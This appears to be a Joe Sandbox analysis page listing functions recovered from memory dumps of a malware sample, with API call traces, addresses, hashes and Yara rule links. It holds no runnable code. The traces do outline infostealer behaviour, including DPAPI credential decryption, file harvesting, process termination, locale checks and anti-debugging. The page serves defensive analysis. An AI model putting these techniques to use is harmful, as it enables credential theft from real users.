Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 0d42fc7c8bfb5a624031ccfdbbde077ea7a6cbd97b9e622b22617585481770b2
Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
Opcode Fuzzy Hash: 0d42fc7c8bfb5a624031ccfdbbde077ea7a6cbd97b9e622b22617585481770b2
Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A

Function 023FDDE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 023FDE52
StrCmpCA.SHLWAPI(?,004215AC), ref: 023FDE9A
StrCmpCA.SHLWAPI(?,004215B0), ref: 023FDEB0
FindNextFileA.KERNEL32(000000FF,?), ref: 023FE133
FindClose.KERNEL32(000000FF), ref: 023FE145

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
Instruction ID: c2220ee2d1911dde10ca79ca9e098f4bfcdcf07a255f6a844a43531afd2482ca
Opcode Fuzzy Hash: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
Instruction Fuzzy Hash: F39134729002189BCB14FBB1ED99DED737AAF95301F0045BEEA4A56190FE349B48CF91

Function 023FFA17 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 023FFA85
StrCmpCA.SHLWAPI(?,004216B4), ref: 023FFAD6
StrCmpCA.SHLWAPI(?,004216B8), ref: 023FFAEC
FindNextFileA.KERNEL32(000000FF,?), ref: 023FFE18
FindClose.KERNEL32(000000FF), ref: 023FFE2A

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
Instruction ID: 27c7d8d52808cc51103ee7c4bb1a2d2bcd6682dfd1e84ea7d3c33fb123744a27
Opcode Fuzzy Hash: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
Instruction Fuzzy Hash: 0DB110719003289BCB24FB65DC94EEE737AAF94300F4045AEDA4A565D1EF305B88CF91

Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
CloseHandle.KERNEL32(00000000), ref: 00419987
CloseHandle.KERNEL32(00409FDE), ref: 00419993

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91

Function 02409B47 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02409B6C
Process32First.KERNEL32(023FA245,00000128), ref: 02409B80
Process32Next.KERNEL32(023FA245,00000128), ref: 02409B95
StrCmpCA.SHLWAPI(?,023FA245), ref: 02409BAA
OpenProcess.KERNEL32(00000001,00000000,?), ref: 02409BC3
TerminateProcess.KERNEL32(00000000,00000000), ref: 02409BE1
CloseHandle.KERNEL32(00000000), ref: 02409BEE
CloseHandle.KERNEL32(023FA245), ref: 02409BFA

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction ID: 65c23cc896cf1a7330737837a6d64267cea15d20df1f6f082afb329ca91ec75c
Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction Fuzzy Hash: BB112175D05218EBCB24DFA5DC88BDE7779BB48704F008599F505A6280EB349B84CF51

Function 0040E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF

Strings

@, xrefs: 0040ECF5, 0040E6EB, 0040E81C, 0040E95B, 0040E5B9, 0040E6EE, 0040E81F, 0040E95E
\*.*, xrefs: 0040E54D

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$@
API String ID: 433455689-2355794846
Opcode ID: 74679944e1b616d55cc5aebd76ef12a98ef731a73dcca30ac8f6a3e26472430f
Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
Opcode Fuzzy Hash: 74679944e1b616d55cc5aebd76ef12a98ef731a73dcca30ac8f6a3e26472430f
Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A

Function 023F1977 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,?,?,004252EC,?,?,00000000,?,00000000), ref: 023F1BCA
StrCmpCA.SHLWAPI(?,00425394), ref: 023F1C1A
StrCmpCA.SHLWAPI(?,0042543C), ref: 023F1C30
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023F1FE7
DeleteFileA.KERNEL32(00000000), ref: 023F2071
FindNextFileA.KERNEL32(000000FF,?), ref: 023F20C7
FindClose.KERNEL32(000000FF), ref: 023F20D9

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID:
API String ID: 1415058207-0
Opcode ID: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
Instruction ID: bf708715c7676596011d980432e9fe912d8045add58cfd6f9debf14d20d01a80
Opcode Fuzzy Hash: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
Instruction Fuzzy Hash: 421297719403289ACB19FB61DC94EEE737AAF54305F4045BEA64A660D0EF746BC8CF90

Function 023FE177 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,004215B8,00420C32), ref: 023FE1C5
StrCmpCA.SHLWAPI(?,004215C0), ref: 023FE215
StrCmpCA.SHLWAPI(?,004215C4), ref: 023FE22B
FindNextFileA.KERNEL32(000000FF,?), ref: 023FE747
FindClose.KERNEL32(000000FF), ref: 023FE759

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID:
API String ID: 2325840235-0
Opcode ID: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
Instruction ID: 1af9b67377813a5b9050333d00200ae62292ee68a4403a620d7d095c7ce99b0b
Opcode Fuzzy Hash: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
Instruction Fuzzy Hash: 27F17B719542289ACB19FB61DCD4EEE733AAF54701F8045EF925A620A0EF306F89CF50

Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
LocalFree.KERNEL32(00000000), ref: 00417EB2

Strings

/ , xrefs: 00417E0F

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: c2c974241ca56b7039442d952b647a70f4f32b71e0b942e61baaf038a649e65f
Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
Opcode Fuzzy Hash: c2c974241ca56b7039442d952b647a70f4f32b71e0b942e61baaf038a649e65f
Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9

Function 0040C920 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C953
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00A6DBB0), ref: 0040C971
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
memcpy.MSVCRT(?,?,?), ref: 0040CA12
lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95

Function 023FCB87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 023FCBBA
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 023FCBD8
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 023FCBE3
memcpy.MSVCRT(?,?,?), ref: 023FCC79
lstrcat.KERNEL32(?,00420B47), ref: 023FCCAA
lstrcat.KERNEL32(?,00420B4B), ref: 023FCCBE
lstrcat.KERNEL32(?,00420B4E), ref: 023FCCDF

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
Instruction ID: fd7c54632af3e0fa3b650cf910dd5ab509cc95b7defc16f0075bb2f8055763fc
Opcode Fuzzy Hash: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
Instruction Fuzzy Hash: 824151B4D4421DDBDB10CF90DD88BEEB7B9BB44304F1045AAF609A6280D7745B84CF91

Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BEA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
TerminateProcess.KERNEL32(00000000), ref: 0041BEE5

Strings

eM, xrefs: 0041BEBD

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: eM
API String ID: 2579439406-4107679315
Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D

Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Strings

>O@, xrefs: 0040A224, 0040A231, 0040A249, 0040A268, 0040A234, 0040A26B

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: >O@
API String ID: 4291131564-3498640338
Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50

Function 0245ED3D Relevance: 7.6, Strings: 6, Instructions: 123COMMON

Download Yara Rule

Strings

\u, xrefs: 0245EEFA
}, xrefs: 0245EE06
}, xrefs: 0245EEF6
{, xrefs: 0245EE11
\u, xrefs: 0245EE0A
{, xrefs: 0245EF01

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID: \u$\u${${$}$}
API String ID: 0-582841131
Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction ID: fe348928ff125e7d62570d4c1bb3e84c746d7a1d8ed6a2037238e72822624230
Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction Fuzzy Hash: B3415A22E19BD9C5CB058B7444A02AEBFB22FE6210F5D429BC4D91F383C775424AD3A5

Function 02407F87 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 02407FD8
LocalAlloc.KERNEL32(00000040,?), ref: 02407FF0
GetKeyboardLayoutList.USER32(?,00000000), ref: 02408004
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02408059
LocalFree.KERNEL32(00000000), ref: 02408119

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID:
API String ID: 3090951853-0
Opcode ID: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
Instruction ID: 68c128126812d2efba3e7936ad625be90dcc4ff67e210cd3d16feb42aa5c2c38
Opcode Fuzzy Hash: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
Instruction Fuzzy Hash: 86410A71941228ABCB24DB95DCD8FEEB375EF44704F2041AAE10A66190DB746FC5CF51

Function 0240B8A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0240C109
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0240C11E
UnhandledExceptionFilter.KERNEL32(0041F2B0), ref: 0240C129
GetCurrentProcess.KERNEL32(C0000409), ref: 0240C145
TerminateProcess.KERNEL32(00000000), ref: 0240C14C

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction ID: 68ac8698de9a3e350428fcc686ca22a4795a9594a9cd4f104a6294e471231dd0
Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction Fuzzy Hash: 5C21BDB9902214DFDB10DF6AF885A883BB4FB08314F52817FE91897261E7B199858F1D

Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55

